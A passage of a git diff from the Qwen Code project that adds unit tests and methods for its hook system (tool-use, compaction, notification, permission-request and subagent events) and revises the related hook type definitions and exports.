HookDecision, + }, + }; + vi.mocked( + mockHookEventHandler.firePostToolUseFailureEvent, + ).mockResolvedValue(mockResult); + + const result = await hookSystem.firePostToolUseFailureEvent( + 'toolu_test123', + 'bash', + { command: 'invalid' }, + 'Command not found', + false, + PermissionMode.AutoEdit, + ); + + expect( + mockHookEventHandler.firePostToolUseFailureEvent, + ).toHaveBeenCalledWith( + 'toolu_test123', + 'bash', + { command: 'invalid' }, + 'Command not found', + false, + PermissionMode.AutoEdit, + ); + expect(result).toBeDefined(); + }); + + it('should pass all parameters to event handler', async () => { + const mockResult = { + success: true, + allOutputs: [], + errors: [], + totalDuration: 0, + finalOutput: { + decision: 'allow' as HookDecision, + }, + }; + vi.mocked( + mockHookEventHandler.firePostToolUseFailureEvent, + ).mockResolvedValue(mockResult); + + await hookSystem.firePostToolUseFailureEvent( + 'toolu_test456', + 'write_file', + { path: '/test.txt' }, + 'Permission denied', + true, + PermissionMode.Yolo, + ); + + expect( + mockHookEventHandler.firePostToolUseFailureEvent, + ).toHaveBeenCalledWith( + 'toolu_test456', + 'write_file', + { path: '/test.txt' }, + 'Permission denied', + true, + PermissionMode.Yolo, + ); + }); + + it('should use default values for optional parameters', async () => { + const mockResult = { + success: true, + allOutputs: [], + errors: [], + totalDuration: 0, + finalOutput: undefined, + }; + vi.mocked( + mockHookEventHandler.firePostToolUseFailureEvent, + ).mockResolvedValue(mockResult); + + await hookSystem.firePostToolUseFailureEvent( + 'toolu_test789', + 'bash', + { command: 'ls' }, + 'Error occurred', + ); + + expect( + mockHookEventHandler.firePostToolUseFailureEvent, + ).toHaveBeenCalledWith( + 'toolu_test789', + 'bash', + { command: 'ls' }, + 'Error occurred', + undefined, + undefined, + ); + }); + + it('should return undefined when no final output', async () => { + const mockResult = { + success: true, + allOutputs: [], + errors: [], + totalDuration: 0, + finalOutput: undefined, + }; + vi.mocked( + mockHookEventHandler.firePostToolUseFailureEvent, + ).mockResolvedValue(mockResult); + + const result = await hookSystem.firePostToolUseFailureEvent( + 'toolu_test999', + 'bash', + { command: 'ls' }, + 'Error', + ); + + expect(result).toBeUndefined(); + }); + + it('should return DefaultHookOutput with error context', async () => { + const mockResult = { + success: true, + allOutputs: [], + errors: [], + totalDuration: 50, + finalOutput: { + decision: 'allow' as HookDecision, + hookSpecificOutput: { + additionalContext: 'Failure due to permission issues', + }, + }, + }; + vi.mocked( + mockHookEventHandler.firePostToolUseFailureEvent, + ).mockResolvedValue(mockResult); + + const result = await hookSystem.firePostToolUseFailureEvent( + 'toolu_test111', + 'bash', + { command: 'ls' }, + 'Permission denied', + ); + + expect(result).toBeDefined(); + expect(result?.getAdditionalContext()).toBe( + 'Failure due to permission issues', + ); + }); + }); + + describe('firePreCompactEvent', () => { + it('should fire PreCompact event with auto trigger and return output', async () => { + const mockResult = { + success: true, + allOutputs: [], + errors: [], + totalDuration: 50, + finalOutput: { + continue: true, + decision: 'allow' as HookDecision, + }, + }; + vi.mocked(mockHookEventHandler.firePreCompactEvent).mockResolvedValue( + mockResult, + ); + + const result = await hookSystem.firePreCompactEvent( + PreCompactTrigger.Auto, + '', + ); + + expect(mockHookEventHandler.firePreCompactEvent).toHaveBeenCalledWith( + PreCompactTrigger.Auto, + '', + ); + expect(result).toBeDefined(); + }); + + it('should fire PreCompact event with manual trigger', async () => { + const mockResult = { + success: true, + allOutputs: [], + errors: [], + totalDuration: 0, + finalOutput: { + decision: 'allow' as HookDecision, + }, + }; + vi.mocked(mockHookEventHandler.firePreCompactEvent).mockResolvedValue( + mockResult, + ); + + await hookSystem.firePreCompactEvent(PreCompactTrigger.Manual, ''); + + expect(mockHookEventHandler.firePreCompactEvent).toHaveBeenCalledWith( + PreCompactTrigger.Manual, + '', + ); + }); + + it('should pass custom instructions to event handler', async () => { + const mockResult = { + success: true, + allOutputs: [], + errors: [], + totalDuration: 0, + finalOutput: { + decision: 'allow' as HookDecision, + }, + }; + vi.mocked(mockHookEventHandler.firePreCompactEvent).mockResolvedValue( + mockResult, + ); + + await hookSystem.firePreCompactEvent( + PreCompactTrigger.Auto, + 'Custom compression instructions', + ); + + expect(mockHookEventHandler.firePreCompactEvent).toHaveBeenCalledWith( + PreCompactTrigger.Auto, + 'Custom compression instructions', + ); + }); + + it('should return undefined when no final output', async () => { + const mockResult = { + success: true, + allOutputs: [], + errors: [], + totalDuration: 0, + finalOutput: undefined, + }; + vi.mocked(mockHookEventHandler.firePreCompactEvent).mockResolvedValue( + mockResult, + ); + + const result = await hookSystem.firePreCompactEvent( + PreCompactTrigger.Auto, + '', + ); + + expect(result).toBeUndefined(); + }); + + it('should return DefaultHookOutput with additional context', async () => { + const mockResult = { + success: true, + allOutputs: [], + errors: [], + totalDuration: 50, + finalOutput: { + decision: 'allow' as HookDecision, + hookSpecificOutput: { + additionalContext: 'Context before compression', + }, + }, + }; + vi.mocked(mockHookEventHandler.firePreCompactEvent).mockResolvedValue( + mockResult, + ); + + const result = await hookSystem.firePreCompactEvent( + PreCompactTrigger.Manual, + '', + ); + + expect(result).toBeDefined(); + expect(result?.getAdditionalContext()).toBe('Context before compression'); + }); + }); + + describe('fireNotificationEvent', () => { + it('should fire Notification event and return output', async () => { + const mockResult = { + success: true, + allOutputs: [], + errors: [], + totalDuration: 50, + finalOutput: { + continue: true, + decision: 'allow' as HookDecision, + }, + }; + vi.mocked(mockHookEventHandler.fireNotificationEvent).mockResolvedValue( + mockResult, + ); + + const result = await hookSystem.fireNotificationEvent( + 'Test notification message', + NotificationType.PermissionPrompt, + 'Permission needed', + ); + + expect(mockHookEventHandler.fireNotificationEvent).toHaveBeenCalledWith( + 'Test notification message', + NotificationType.PermissionPrompt, + 'Permission needed', + ); + expect(result).toBeDefined(); + }); + + it('should pass all parameters to event handler', async () => { + const mockResult = { + success: true, + allOutputs: [], + errors: [], + totalDuration: 0, + finalOutput: { + decision: 'allow' as HookDecision, + }, + }; + vi.mocked(mockHookEventHandler.fireNotificationEvent).mockResolvedValue( + mockResult, + ); + + await hookSystem.fireNotificationEvent( + 'Qwen Code is waiting for your input', + NotificationType.IdlePrompt, + 'Waiting for input', + ); + + expect(mockHookEventHandler.fireNotificationEvent).toHaveBeenCalledWith( + 'Qwen Code is waiting for your input', + NotificationType.IdlePrompt, + 'Waiting for input', + ); + }); + + it('should handle notification without title', async () => { + const mockResult = { + success: true, + allOutputs: [], + errors: [], + totalDuration: 0, + finalOutput: { + decision: 'allow' as HookDecision, + }, + }; + vi.mocked(mockHookEventHandler.fireNotificationEvent).mockResolvedValue( + mockResult, + ); + + await hookSystem.fireNotificationEvent( + 'Authentication successful', + NotificationType.AuthSuccess, + ); + + expect(mockHookEventHandler.fireNotificationEvent).toHaveBeenCalledWith( + 'Authentication successful', + NotificationType.AuthSuccess, + undefined, + ); + }); + + it('should return undefined when no final output', async () => { + const mockResult = { + success: true, + allOutputs: [], + errors: [], + totalDuration: 0, + finalOutput: undefined, + }; + vi.mocked(mockHookEventHandler.fireNotificationEvent).mockResolvedValue( + mockResult, + ); + + const result = await hookSystem.fireNotificationEvent( + 'Test message', + NotificationType.PermissionPrompt, + ); + + expect(result).toBeUndefined(); + }); + + it('should return DefaultHookOutput with additional context', async () => { + const mockResult = { + success: true, + allOutputs: [], + errors: [], + totalDuration: 50, + finalOutput: { + decision: 'allow' as HookDecision, + hookSpecificOutput: { + additionalContext: 'Notification handled by custom handler', + }, + }, + }; + vi.mocked(mockHookEventHandler.fireNotificationEvent).mockResolvedValue( + mockResult, + ); + + const result = await hookSystem.fireNotificationEvent( + 'Test notification', + NotificationType.IdlePrompt, + ); + + expect(result).toBeDefined(); + expect(result?.getAdditionalContext()).toBe( + 'Notification handled by custom handler', + ); + }); + + it('should handle elicitation_dialog notification type', async () => { + const mockResult = { + success: true, + allOutputs: [], + errors: [], + totalDuration: 0, + finalOutput: { + decision: 'allow' as HookDecision, + }, + }; + vi.mocked(mockHookEventHandler.fireNotificationEvent).mockResolvedValue( + mockResult, + ); + + await hookSystem.fireNotificationEvent( + 'Dialog shown to user', + NotificationType.ElicitationDialog, + 'Dialog', + ); + + expect(mockHookEventHandler.fireNotificationEvent).toHaveBeenCalledWith( + 'Dialog shown to user', + NotificationType.ElicitationDialog, + 'Dialog', + ); + }); + }); + + describe('firePermissionRequestEvent', () => { + it('should delegate to hookEventHandler.firePermissionRequestEvent', async () => { + const mockFinalOutput = { + hookSpecificOutput: { + decision: { + behavior: 'allow' as const, + }, + }, + }; + const mockAggregated = createMockAggregatedResult(true, mockFinalOutput); + + vi.mocked( + mockHookEventHandler.firePermissionRequestEvent, + ).mockResolvedValue(mockAggregated); + + const result = await hookSystem.firePermissionRequestEvent( + 'Bash', + { command: 'ls -la' }, + PermissionMode.Default, + ); + + expect( + mockHookEventHandler.firePermissionRequestEvent, + ).toHaveBeenCalledWith( + 'Bash', + { command: 'ls -la' }, + PermissionMode.Default, + undefined, + ); + expect(result).toBeDefined(); + // Type assertion needed because getPermissionDecision is specific to PermissionRequestHookOutput + const permissionResult = result as unknown as { + getPermissionDecision: () => { behavior: string } | undefined; + }; + expect(permissionResult.getPermissionDecision()?.behavior).toBe('allow'); + }); + + it('should include permission_suggestions when provided', async () => { + const mockAggregated = createMockAggregatedResult(true); + const suggestions: PermissionSuggestion[] = [ + { type: 'toolAlwaysAllow', tool: 'Bash' }, + ]; + + vi.mocked( + mockHookEventHandler.firePermissionRequestEvent, + ).mockResolvedValue(mockAggregated); + + await hookSystem.firePermissionRequestEvent( + 'Bash', + { command: 'npm test' }, + PermissionMode.Default, + suggestions, + ); + + expect( + mockHookEventHandler.firePermissionRequestEvent, + ).toHaveBeenCalledWith( + 'Bash', + { command: 'npm test' }, + PermissionMode.Default, + suggestions, + ); + }); + + it('should return undefined when hook has no finalOutput', async () => { + const mockAggregated = createMockAggregatedResult(false); + + vi.mocked( + mockHookEventHandler.firePermissionRequestEvent, + ).mockResolvedValue(mockAggregated); + + const result = await hookSystem.firePermissionRequestEvent( + 'ReadFile', + { file_path: '/test.txt' }, + PermissionMode.Plan, + ); + + expect(result).toBeUndefined(); + }); + + it('should handle all permission modes correctly', async () => { + const mockAggregated = createMockAggregatedResult(true); + + vi.mocked( + mockHookEventHandler.firePermissionRequestEvent, + ).mockResolvedValue(mockAggregated); + + // Test Default mode + await hookSystem.firePermissionRequestEvent( + 'Bash', + { command: 'test' }, + PermissionMode.Default, + ); + + // Test Plan mode + await hookSystem.firePermissionRequestEvent( + 'Bash', + { command: 'test' }, + PermissionMode.Plan, + ); + + // Test Yolo mode + await hookSystem.firePermissionRequestEvent( + 'Bash', + { command: 'test' }, + PermissionMode.Yolo, + ); + + expect( + mockHookEventHandler.firePermissionRequestEvent, + ).toHaveBeenCalledTimes(3); + }); + + it('should pass through hook errors', async () => { + const mockAggregated = createMockAggregatedResult(false); + mockAggregated.errors = [new Error('PermissionRequest hook error')]; + + vi.mocked( + mockHookEventHandler.firePermissionRequestEvent, + ).mockResolvedValue(mockAggregated); + + const result = await hookSystem.firePermissionRequestEvent( + 'Bash', + { command: 'test' }, + PermissionMode.Default, + ); + + expect(result).toBeUndefined(); + }); + }); + + describe('fireSubagentStartEvent', () => { + it('should fire SubagentStart event and return output', async () => { + const mockResult = { + success: true, + allOutputs: [], + errors: [], + totalDuration: 50, + finalOutput: { + decision: 'allow' as HookDecision, + }, + }; + vi.mocked(mockHookEventHandler.fireSubagentStartEvent).mockResolvedValue( + mockResult, + ); + + const result = await hookSystem.fireSubagentStartEvent( + 'agent-123', + 'code-reviewer', + PermissionMode.Default, + ); + + expect(mockHookEventHandler.fireSubagentStartEvent).toHaveBeenCalledWith( + 'agent-123', + 'code-reviewer', + PermissionMode.Default, + ); + expect(result).toBeDefined(); + }); + + it('should pass AgentType enum as agent type', async () => { + const mockResult = { + success: true, + allOutputs: [], + errors: [], + totalDuration: 0, + finalOutput: { + decision: 'allow' as HookDecision, + }, + }; + vi.mocked(mockHookEventHandler.fireSubagentStartEvent).mockResolvedValue( + mockResult, + ); + + await hookSystem.fireSubagentStartEvent( + 'agent-456', + AgentType.Bash, + PermissionMode.Yolo, + ); + + expect(mockHookEventHandler.fireSubagentStartEvent).toHaveBeenCalledWith( + 'agent-456', + AgentType.Bash, + PermissionMode.Yolo, + ); + }); + + it('should return undefined when no final output', async () => { + const mockResult = { + success: true, + allOutputs: [], + errors: [], + totalDuration: 0, + finalOutput: undefined, + }; + vi.mocked(mockHookEventHandler.fireSubagentStartEvent).mockResolvedValue( + mockResult, + ); + + const result = await hookSystem.fireSubagentStartEvent( + 'agent-789', + 'test-agent', + PermissionMode.Default, + ); + + expect(result).toBeUndefined(); + }); + + it('should return DefaultHookOutput with additional context', async () => { + const mockResult = { + success: true, + allOutputs: [], + errors: [], + totalDuration: 50, + finalOutput: { + decision: 'allow' as HookDecision, + hookSpecificOutput: { + additionalContext: 'Extra context injected by SubagentStart hook', + }, + }, + }; + vi.mocked(mockHookEventHandler.fireSubagentStartEvent).mockResolvedValue( + mockResult, + ); + + const result = await hookSystem.fireSubagentStartEvent( + 'agent-111', + 'code-reviewer', + PermissionMode.Default, + ); + + expect(result).toBeDefined(); + expect(result?.getAdditionalContext()).toBe( + 'Extra context injected by SubagentStart hook', + ); + }); + }); + + describe('fireSubagentStopEvent', () => { + it('should fire SubagentStop event and return output', async () => { + const mockResult = { + success: true, + allOutputs: [], + errors: [], + totalDuration: 50, + finalOutput: { + continue: true, + decision: 'allow' as HookDecision, + }, + }; + vi.mocked(mockHookEventHandler.fireSubagentStopEvent).mockResolvedValue( + mockResult, + ); + + const result = await hookSystem.fireSubagentStopEvent( + 'agent-123', + 'code-reviewer', + '/path/to/transcript.jsonl', + 'Final output from subagent', + false, + PermissionMode.Default, + ); + + expect(mockHookEventHandler.fireSubagentStopEvent).toHaveBeenCalledWith( + 'agent-123', + 'code-reviewer', + '/path/to/transcript.jsonl', + 'Final output from subagent', + false, + PermissionMode.Default, + ); + expect(result).toBeDefined(); + }); + + it('should pass all parameters to event handler', async () => { + const mockResult = { + success: true, + allOutputs: [], + errors: [], + totalDuration: 0, + finalOutput: { + decision: 'allow' as HookDecision, + }, + }; + vi.mocked(mockHookEventHandler.fireSubagentStopEvent).mockResolvedValue( + mockResult, + ); + + await hookSystem.fireSubagentStopEvent( + 'agent-456', + 'qwen-tester', + '/transcript/path.jsonl', + 'last message from agent', + true, + PermissionMode.Plan, + ); + + expect(mockHookEventHandler.fireSubagentStopEvent).toHaveBeenCalledWith( + 'agent-456', + 'qwen-tester', + '/transcript/path.jsonl', + 'last message from agent', + true, + PermissionMode.Plan, + ); + }); + + it('should return undefined when no final output', async () => { + const mockResult = { + success: true, + allOutputs: [], + errors: [], + totalDuration: 0, + finalOutput: undefined, + }; + vi.mocked(mockHookEventHandler.fireSubagentStopEvent).mockResolvedValue( + mockResult, + ); + + const result = await hookSystem.fireSubagentStopEvent( + 'agent-789', + 'test-agent', + '/path/transcript.jsonl', + 'output', + false, + PermissionMode.Default, + ); + + expect(result).toBeUndefined(); + }); + + it('should return StopHookOutput with blocking decision', async () => { + const mockResult = { + success: true, + allOutputs: [], + errors: [], + totalDuration: 50, + finalOutput: { + decision: 'block' as HookDecision, + reason: 'Output too short, continue working', + }, + }; + vi.mocked(mockHookEventHandler.fireSubagentStopEvent).mockResolvedValue( + mockResult, + ); + + const result = await hookSystem.fireSubagentStopEvent( + 'agent-999', + 'code-reviewer', + '/path/transcript.jsonl', + 'short', + false, + PermissionMode.Default, + ); + + expect(result).toBeDefined(); + expect(result?.isBlockingDecision()).toBe(true); + expect(result?.getEffectiveReason()).toBe( + 'Output too short, continue working', + ); + }); + + it('should return StopHookOutput with allow decision', async () => { + const mockResult = { + success: true, + allOutputs: [], + errors: [], + totalDuration: 50, + finalOutput: { + decision: 'allow' as HookDecision, + reason: 'Output looks good', + }, + }; + vi.mocked(mockHookEventHandler.fireSubagentStopEvent).mockResolvedValue( + mockResult, + ); + + const result = await hookSystem.fireSubagentStopEvent( + 'agent-222', + 'code-reviewer', + '/path/transcript.jsonl', + 'A comprehensive review of the code...', + false, + PermissionMode.Default, + ); + + expect(result).toBeDefined(); + expect(result?.isBlockingDecision()).toBe(false); + }); + }); }); diff --git a/packages/core/src/hooks/hookSystem.ts b/packages/core/src/hooks/hookSystem.ts index 8a40cbd9e..4716a0c84 100644 --- a/packages/core/src/hooks/hookSystem.ts +++ b/packages/core/src/hooks/hookSystem.ts @@ -14,6 +14,15 @@ import type { HookRegistryEntry } from './hookRegistry.js'; import { createDebugLogger } from '../utils/debugLogger.js'; import type { DefaultHookOutput } from './types.js'; import { createHookOutput } from './types.js'; +import type { + SessionStartSource, + SessionEndReason, + AgentType, + PermissionMode, + PreCompactTrigger, + NotificationType, + PermissionSuggestion, +} from './types.js'; const debugLogger = createDebugLogger('TRUSTED_HOOKS'); @@ -100,4 +109,192 @@ export class HookSystem { ? createHookOutput('Stop', result.finalOutput) : undefined; } + + async fireSessionStartEvent( + source: SessionStartSource, + model: string, + permissionMode?: PermissionMode, + agentType?: AgentType, + ): Promise { + const result = await this.hookEventHandler.fireSessionStartEvent( + source, + model, + permissionMode, + agentType, + ); + return result.finalOutput + ? createHookOutput('SessionStart', result.finalOutput) + : undefined; + } + + async fireSessionEndEvent( + reason: SessionEndReason, + ): Promise { + const result = await this.hookEventHandler.fireSessionEndEvent(reason); + return result.finalOutput + ? createHookOutput('SessionEnd', result.finalOutput) + : undefined; + } + + /** + * Fire a PreToolUse event - called before tool execution + */ + async firePreToolUseEvent( + toolName: string, + toolInput: Record, + toolUseId: string, + permissionMode: PermissionMode, + ): Promise { + const result = await this.hookEventHandler.firePreToolUseEvent( + toolName, + toolInput, + toolUseId, + permissionMode, + ); + return result.finalOutput + ? createHookOutput('PreToolUse', result.finalOutput) + : undefined; + } + + /** + * Fire a PostToolUse event - called after successful tool execution + */ + async firePostToolUseEvent( + toolName: string, + toolInput: Record, + toolResponse: Record, + toolUseId: string, + permissionMode: PermissionMode, + ): Promise { + const result = await this.hookEventHandler.firePostToolUseEvent( + toolName, + toolInput, + toolResponse, + toolUseId, + permissionMode, + ); + return result.finalOutput + ? createHookOutput('PostToolUse', result.finalOutput) + : undefined; + } + + /** + * Fire a PostToolUseFailure event - called when tool execution fails + */ + async firePostToolUseFailureEvent( + toolUseId: string, + toolName: string, + toolInput: Record, + errorMessage: string, + isInterrupt?: boolean, + permissionMode?: PermissionMode, + ): Promise { + const result = await this.hookEventHandler.firePostToolUseFailureEvent( + toolUseId, + toolName, + toolInput, + errorMessage, + isInterrupt, + permissionMode, + ); + return result.finalOutput + ? createHookOutput('PostToolUseFailure', result.finalOutput) + : undefined; + } + + /** + * Fire a PreCompact event - called before conversation compaction + */ + async firePreCompactEvent( + trigger: PreCompactTrigger, + customInstructions: string = '', + ): Promise { + const result = await this.hookEventHandler.firePreCompactEvent( + trigger, + customInstructions, + ); + return result.finalOutput + ? createHookOutput('PreCompact', result.finalOutput) + : undefined; + } + + /** + * Fire a Notification event + */ + async fireNotificationEvent( + message: string, + notificationType: NotificationType, + title?: string, + ): Promise { + const result = await this.hookEventHandler.fireNotificationEvent( + message, + notificationType, + title, + ); + return result.finalOutput + ? createHookOutput('Notification', result.finalOutput) + : undefined; + } + + /** + * Fire a SubagentStart event - called when a subagent is spawned + */ + async fireSubagentStartEvent( + agentId: string, + agentType: AgentType | string, + permissionMode: PermissionMode, + ): Promise { + const result = await this.hookEventHandler.fireSubagentStartEvent( + agentId, + agentType, + permissionMode, + ); + return result.finalOutput + ? createHookOutput('SubagentStart', result.finalOutput) + : undefined; + } + + /** + * Fire a SubagentStop event - called when a subagent finishes + */ + async fireSubagentStopEvent( + agentId: string, + agentType: AgentType | string, + agentTranscriptPath: string, + lastAssistantMessage: string, + stopHookActive: boolean, + permissionMode: PermissionMode, + ): Promise { + const result = await this.hookEventHandler.fireSubagentStopEvent( + agentId, + agentType, + agentTranscriptPath, + lastAssistantMessage, + stopHookActive, + permissionMode, + ); + return result.finalOutput + ? createHookOutput('SubagentStop', result.finalOutput) + : undefined; + } + + /** + * Fire a PermissionRequest event + */ + async firePermissionRequestEvent( + toolName: string, + toolInput: Record, + permissionMode: PermissionMode, + permissionSuggestions?: PermissionSuggestion[], + ): Promise { + const result = await this.hookEventHandler.firePermissionRequestEvent( + toolName, + toolInput, + permissionMode, + permissionSuggestions, + ); + return result.finalOutput + ? createHookOutput('PermissionRequest', result.finalOutput) + : undefined; + } } diff --git a/packages/core/src/hooks/types.ts b/packages/core/src/hooks/types.ts index 49ac7a5ef..e07e1087c 100644 --- a/packages/core/src/hooks/types.ts +++ b/packages/core/src/hooks/types.ts @@ -3,6 +3,9 @@ * Copyright 2026 Qwen Team * SPDX-License-Identifier: Apache-2.0 */ +import { createDebugLogger } from '../utils/debugLogger.js'; + +const debugLogger = createDebugLogger('TRUSTED_HOOKS'); export enum HooksConfigSource { Project = 'project', @@ -125,7 +128,12 @@ export function createHookOutput( switch (eventName) { case HookEventName.PreToolUse: return new PreToolUseHookOutput(data); + case HookEventName.PostToolUse: + return new PostToolUseHookOutput(data); + case HookEventName.PostToolUseFailure: + return new PostToolUseFailureHookOutput(data); case HookEventName.Stop: + case HookEventName.SubagentStop: return new StopHookOutput(data); case HookEventName.PermissionRequest: return new PermissionRequestHookOutput(data); @@ -222,21 +230,110 @@ export class DefaultHookOutput implements HookOutput { */ export class PreToolUseHookOutput extends DefaultHookOutput { /** - * Get modified tool input if provided by hook + * Get permission decision from hook output + * @returns 'allow' | 'deny' | 'ask' | undefined */ - getModifiedToolInput(): Record | undefined { - if (this.hookSpecificOutput && 'tool_input' in this.hookSpecificOutput) { - const input = this.hookSpecificOutput['tool_input']; - if ( - typeof input === 'object' && - input !== null && - !Array.isArray(input) - ) { - return input as Record; + getPermissionDecision(): 'allow' | 'deny' | 'ask' | undefined { + if ( + this.hookSpecificOutput && + 'permissionDecision' in this.hookSpecificOutput + ) { + const decision = this.hookSpecificOutput['permissionDecision']; + if (decision === 'allow' || decision === 'deny' || decision === 'ask') { + return decision; } } + // Fall back to base decision field + if (this.decision === 'allow' || this.decision === 'approve') { + return 'allow'; + } + if (this.decision === 'deny' || this.decision === 'block') { + return 'deny'; + } + if (this.decision === 'ask') { + return 'ask'; + } return undefined; } + + /** + * Get permission decision reason + */ + getPermissionDecisionReason(): string | undefined { + if ( + this.hookSpecificOutput && + 'permissionDecisionReason' in this.hookSpecificOutput + ) { + const reason = this.hookSpecificOutput['permissionDecisionReason']; + if (typeof reason === 'string') { + return reason; + } + } + return this.reason; + } + + /** + * Check if permission was denied + */ + isDenied(): boolean { + return this.getPermissionDecision() === 'deny'; + } + + /** + * Check if user confirmation is required + */ + isAsk(): boolean { + return this.getPermissionDecision() === 'ask'; + } + + /** + * Check if permission was allowed + */ + isAllowed(): boolean { + return this.getPermissionDecision() === 'allow'; + } +} + +/** + * Specific hook output class for PostToolUse events. + * Default behavior is to allow tool usage if the hook does not explicitly set a decision. + * This follows the security model of allowing by default unless explicitly blocked. + */ +export class PostToolUseHookOutput extends DefaultHookOutput { + override decision: HookDecision; + override reason: string; + + constructor(data: Partial = {}) { + super(data); + // Default to allowing tool usage if hook does not provide explicit decision + // This maintains backward compatibility and follows security model of allowing by default + this.decision = data.decision ?? 'allow'; + this.reason = data.reason ?? 'No reason provided'; + + // Log when default values are used to help with debugging + if (data.decision === undefined) { + debugLogger.debug( + 'PostToolUseHookOutput: No explicit decision set, defaulting to "allow"', + ); + } + if (data.reason === undefined) { + debugLogger.debug( + 'PostToolUseHookOutput: No explicit reason set, defaulting to "No reason provided"', + ); + } + } +} + +/** + * Specific hook output class for PostToolUseFailure events. + */ +export class PostToolUseFailureHookOutput extends DefaultHookOutput { + /** + * Get additional context to provide error handling information + */ + override getAdditionalContext(): string | undefined { + return super.getAdditionalContext(); + } } /** @@ -353,44 +450,23 @@ export class PermissionRequestHookOutput extends DefaultHookOutput { } /** - * Context for MCP tool executions. - * Contains non-sensitive connection information about the MCP server - * identity. Since server_name is user controlled and arbitrary, we - * also include connection information (e.g., command or url) to - * help identify the MCP server. - * - * NOTE: In the future, consider defining a shared sanitized interface - * from MCPServerConfig to avoid duplication and ensure consistency. + * PreToolUse hook input */ -export interface McpToolContext { - server_name: string; - tool_name: string; // Original tool name from the MCP server - - // Connection info (mutually exclusive based on transport type) - command?: string; // For stdio transport - args?: string[]; // For stdio transport - cwd?: string; // For stdio transport - - url?: string; // For SSE/HTTP transport - - tcp?: string; // For WebSocket transport -} - export interface PreToolUseInput extends HookInput { - permission_mode?: PermissionMode; + permission_mode: PermissionMode; tool_name: string; tool_input: Record; - mcp_context?: McpToolContext; - original_request_name?: string; + tool_use_id: string; // Unique identifier for this tool use instance } /** * PreToolUse hook output */ export interface PreToolUseOutput extends HookOutput { - hookSpecificOutput?: { + hookSpecificOutput: { hookEventName: 'PreToolUse'; - tool_input?: Record; + permissionDecision: 'allow' | 'deny' | 'ask'; + permissionDecisionReason: string; }; } @@ -398,30 +474,24 @@ export interface PreToolUseOutput extends HookOutput { * PostToolUse hook input */ export interface PostToolUseInput extends HookInput { + permission_mode: PermissionMode; tool_name: string; tool_input: Record; tool_response: Record; - mcp_context?: McpToolContext; - original_request_name?: string; + tool_use_id: string; // Unique identifier for this tool use instance } /** * PostToolUse hook output */ export interface PostToolUseOutput extends HookOutput { + decision: HookDecision; + reason: string; hookSpecificOutput?: { hookEventName: 'PostToolUse'; additionalContext?: string; - - /** - * Optional request to execute another tool immediately after this one. - * The result of this tail call will replace the original tool's response. - */ - tailToolCallRequest?: { - name: string; - args: Record; - }; }; + updatedMCPToolOutput?: Record; } /** @@ -429,11 +499,11 @@ export interface PostToolUseOutput extends HookOutput { * Fired when a tool execution fails */ export interface PostToolUseFailureInput extends HookInput { + permission_mode: PermissionMode; tool_use_id: string; // Unique identifier for the tool use tool_name: string; tool_input: Record; error: string; // Error message describing the failure - error_type?: string; // Type of error (e.g., 'timeout', 'network', 'permission', etc.) is_interrupt?: boolean; // Whether the failure was caused by user interruption } @@ -469,18 +539,19 @@ export interface UserPromptSubmitOutput extends HookOutput { * Notification types */ export enum NotificationType { - ToolPermission = 'ToolPermission', + PermissionPrompt = 'permission_prompt', + IdlePrompt = 'idle_prompt', + AuthSuccess = 'auth_success', + ElicitationDialog = 'elicitation_dialog', } /** * Notification hook input */ export interface NotificationInput extends HookInput { - permission_mode?: PermissionMode; - notification_type: NotificationType; message: string; title?: string; - details: Record; + notification_type: NotificationType; } /** @@ -524,18 +595,18 @@ export enum SessionStartSource { export enum PermissionMode { Default = 'default', Plan = 'plan', - AcceptEdit = 'accept_edit', - DontAsk = 'dont_ask', - BypassPermissions = 'bypass_permissions', + AutoEdit = 'auto_edit', + Yolo = 'yolo', } /** * SessionStart hook input */ export interface SessionStartInput extends HookInput { - permission_mode?: PermissionMode; + permission_mode: PermissionMode; source: SessionStartSource; - model?: string; + model: string; + agent_type?: AgentType; } /** @@ -589,7 +660,7 @@ export enum PreCompactTrigger { */ export interface PreCompactInput extends HookInput { trigger: PreCompactTrigger; - custom_instructions?: string; + custom_instructions: string; } /** @@ -598,7 +669,7 @@ export interface PreCompactInput extends HookInput { export interface PreCompactOutput extends HookOutput { hookSpecificOutput?: { hookEventName: 'PreCompact'; - additionalContext?: string; + additionalContext: string; }; } @@ -611,12 +682,12 @@ export enum AgentType { /** * SubagentStart hook input - * Fired when a subagent (Task tool call) is started + * Fired when a subagent (Agent tool call) is spawned */ export interface SubagentStartInput extends HookInput { - permission_mode?: PermissionMode; + permission_mode: PermissionMode; agent_id: string; - agent_type: AgentType; + agent_type: AgentType | string; } /** @@ -631,13 +702,13 @@ export interface SubagentStartOutput extends HookOutput { /** * SubagentStop hook input - * Fired right before a subagent (Task tool call) concludes its response + * Fired when a subagent has finished responding */ export interface SubagentStopInput extends HookInput { - permission_mode?: PermissionMode; + permission_mode: PermissionMode; stop_hook_active: boolean; agent_id: string; - agent_type: AgentType; + agent_type: AgentType | string; agent_transcript_path: string; last_assistant_message: string; } diff --git a/packages/core/src/index.ts b/packages/core/src/index.ts index e1fe65d2f..8ca2014b7 100644 --- a/packages/core/src/index.ts +++ b/packages/core/src/index.ts @@ -12,6 +12,9 @@ export * from './config/config.js'; export { Storage } from './config/storage.js'; +// Permission system +export * from './permissions/index.js'; + // Model configuration export { DEFAULT_QWEN_MODEL, @@ -88,6 +91,8 @@ export * from './tools/shell.js'; export * from './tools/skill.js'; export * from './tools/task.js'; export * from './tools/todoWrite.js'; +export * from './tools/tool-error.js'; +export * from './tools/tool-registry.js'; export * from './tools/web-fetch.js'; export * from './tools/web-search/index.js'; export * from './tools/write-file.js'; @@ -100,6 +105,7 @@ export * from './services/chatRecordingService.js'; export * from './services/fileDiscoveryService.js'; export * from './services/fileSystemService.js'; export * from './services/gitService.js'; +export * from './services/gitWorktreeService.js'; export * from './services/sessionService.js'; export * from './services/shellExecutionService.js'; @@ -175,13 +181,14 @@ export { } from './telemetry/types.js'; // ============================================================================ -// Extensions, Skills & Subagents +// Extensions, Skills, Subagents & Agents // ============================================================================ export * from './extension/index.js'; export * from './prompts/mcp-prompts.js'; export * from './skills/index.js'; export * from './subagents/index.js'; +export * from './agents/index.js'; // ============================================================================ // Utilities @@ -191,6 +198,7 @@ export * from './utils/browser.js'; export * from './utils/configResolver.js'; export * from './utils/debugLogger.js'; export * from './utils/editor.js'; +export * from './utils/environmentContext.js'; export * from './utils/errorParsing.js'; export * from './utils/errors.js'; export * from './utils/fileUtils.js'; @@ -212,6 +220,7 @@ export * from './utils/promptIdContext.js'; export * from './utils/quotaErrorDetection.js'; export * from './utils/readManyFiles.js'; export * from './utils/request-tokenizer/supportedImageFormats.js'; +export { TextTokenizer } from 